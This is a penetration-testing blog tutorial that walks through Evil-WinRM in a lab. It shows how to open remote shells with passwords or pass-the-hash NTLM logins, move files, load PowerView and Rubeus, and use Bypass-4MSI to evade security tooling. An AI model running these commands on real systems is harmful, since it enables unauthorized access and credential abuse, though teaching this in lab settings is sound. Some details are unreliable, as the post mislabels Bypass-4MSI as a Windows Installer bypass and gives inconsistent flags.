Hi everyone, welcome to Pentestguy! In this post, we will provide a detailed walkthrough on Evil-WinRM. This detailed walkthrough on Evil-WinRM will cover everything you need to know about using this powerful tool for remote access and command execution in penetration testing scenarios. Whether you’re new to Evil-WinRM or looking to enhance your skills, this detailed walkthrough on Evil-WinRM will guide you through its setup, features, and practical applications.
What is WinRM?
Windows Remote Management (WinRM) is a Microsoft implementation of the WS-Management protocol, a standard web services protocol for remote server and client management. WinRM allows administrators to run management scripts, perform remote command executions, and manage Windows machines in a networked environment. The default ports for winrm are (HTTP: 5985, and HTTPS: 5986).
Configure WinRM
Here, the goal is to make the Windows machine vulnerable to testing Evil-WinRM. Enable WinRM (Windows Remote Management): Evil-WinRM connects via PowerShell remoting (WinRM), so this service must be enabled.
Open PowerShell as an Administrator and run the following command to enable PowerShell remoting:
Enable-PSRemoting -Force
The above command enables WinRM and starts the service, allowing connections on ports 5985 (HTTP) and 5986 (HTTPS).
By default, the Windows Firewall blocks most inbound connections. You need to allow inbound traffic on the ports WinRM uses. Run the command below, to allow traffic on ports 5985 (HTTP) and 5986 (HTTPS).
New-NetFirewallRule -Name "WinRM" -DisplayName "WinRM" -Enabled True -Direction Inbound -Protocol TCP -LocalPort 5985,5986 -Action Allow
If you can’t ping the targeted Windows host, make sure to disable the firewall, as it’s just a lab(for testing purposes).
netsh advfirewall set allprofiles state off
You can also use hack the box or tryhackme rooms, which have different challenges for evil-winrm.
What is Evil-WinRM?
Evil-WinRM (Evil Windows Remote Management) is a powerful tool used for remote management of Windows machines. It utilizes Windows Remote Management (WinRM) to establish a remote shell, allowing users to execute commands and interact with the Windows operating system remotely.
Installing Evil-WinRM
Evil-WinRM comes preinstalled on Kali Linux, but if we want to install it on other distros, like Ubuntu, we can follow the steps given below.
Open the terminal in Ubuntu or any other distros and install Ruby.
sudo apt install ruby
Now continue with the same terminal and install evil-winrm using gem
sudo gem install evil-winrm
To check if Evil-WinRM is installed correctly, run
evil-winrm -h
Now, we will see the different scenarios where we can use evil-winrm with other tools.
Identify the target
Use Nmap to check whether the winrm service is running or not.
nmap -p 5985,5986 <target-ip>
Example:
nmap -p 5985,5986 192.168.31.208
Basic Authentication (Plaintext password)
Establish a remote session using a username and password using the command given below. As we can say if we get a username and password in CTF or while pentesting then we can use evil-winrm to perform the basic authentication.
evil-winrm -i <target-ip> -u <username> -p <password>
Example:
evil-winrm -i 192.168.31.208 -u pentestguy -p toor
Basic Commands
After connecting to a session, use the command below to check for the menu in the tool.
menu
File upload
Transfer the file from the attacker box to the targeted system, where an attacker/pentester can upload any file, using the command given below.
upload <local-file-path> <remote-file-path>
Example:
upload test.txt .
File download
Likewise, for upload, there is a download option as well, by using the attacker can download any file present on the targeted system.
download <remote-file-path> <local-file-path>
Example:
download secret.txt /home/shubham/secret.txt
Load Powershell Script
The load powershell script features of evil-winrm allow loading any powershell script. The scripts must be in the path set at -s argument. Type the menu again and see the loaded functions. Huge files can take a long time to be loaded.
Open the terminal, and run the command below. Make sure to place the powershell script in the location which we are providing in the command.
evil-winrm -i <target-ip> -u <username> -p <password> -s <script-location>
Example
evil-winrm -i 192.168.31.101 -u pentestguy -p toor -s /home/shubham/recon
Bypass Windows security mechanisms to execute scripts or commands.
Bypass-4MSI is used to bypass Windows Installer security, allowing you to execute commands that would typically be blocked. While you may not need to explicitly invoke this command in Evil-WinRM, it is leveraged internally when executing certain scripts or commands to evade security measures. If running a script, ensure it’s crafted to utilize the Bypass-4MSI capability, especially if it’s being flagged by security software.
After creating a session make sure to run the below command to load the powershell script and use more commands from the powershell script. For demonstration, I am using PowerView.ps1
Bypass-4MSI
PowerView.ps1
menu
Now, we can see the options from PowerView, try something like Get-Domain
Invoke-Binary
The Invoke-Binary feature of the evil-winrm helps involve/run the binary or executable file, allowing for the post-exploitation. Similarly, we use the -s option to execute the Powershell script path, this time we use the -e flag to add the executable binaries.
Open the terminal and run the below command to add the executable binaries. Make sure to place the executables in the location we provide in the command.
evil-winrm -i <target-ip> -u <username> -p <password> -s <executable-location>
Example:
evil-winrm -i 192.168.31.101 -u pentestguy -p toor -e /home/shubham/recon
Bypass-4MSI
We are invoking Rubeus.exe here which helps for Kerberos interaction and abuses.
Invoke-Binary /home/shubham/recon/Rubeus.exe
Services Enum
The services option in Evil-WinRM allows you to manage Windows services on a remote machine, offering key capabilities for post-exploitation. You can list, start, stop, and create services directly from the Evil-WinRM shell.
Listing Services: Use the services command to view all running services on the system.
Authentication With NTLM Hash
Evil-Winrm allows authenticating using NTLM hashes as well, there are different ways to get the NTML hash. Open the terminal and run the command below to authenticate with the correct user NTLM hash.
evil-winrm -i <target-ip> -u <username>
-H <NTLM-HASH>
Example:
evil-winrm -i 192.168.31.101 -u pentestguy -H afc44ee7351d61d00698796da06b1ebf
Run Evil-Winrm via docker
The good thing is that the developer of evil-winrm created a Docker image of the solution that is easy to run in any environment. Open the terminal and execute the below Docker command. Make sure that Docker is pre-installed on your system.
Docker Image link – https://hub.docker.com/r/oscarakaelvis/evil-winrm
docker run --rm -it --name evil-winrm oscarakaelvis/evil-winrm -i 192.168.31.208 -u pentestguy -p 'toor'
That’s all about this post. Please share this post with your co-workers and friends if you found it helpful. Please provide valuable comments and let us know if you have any suggestions. Now, you can also collaborate with us. Please check our collaboration page. Thank you!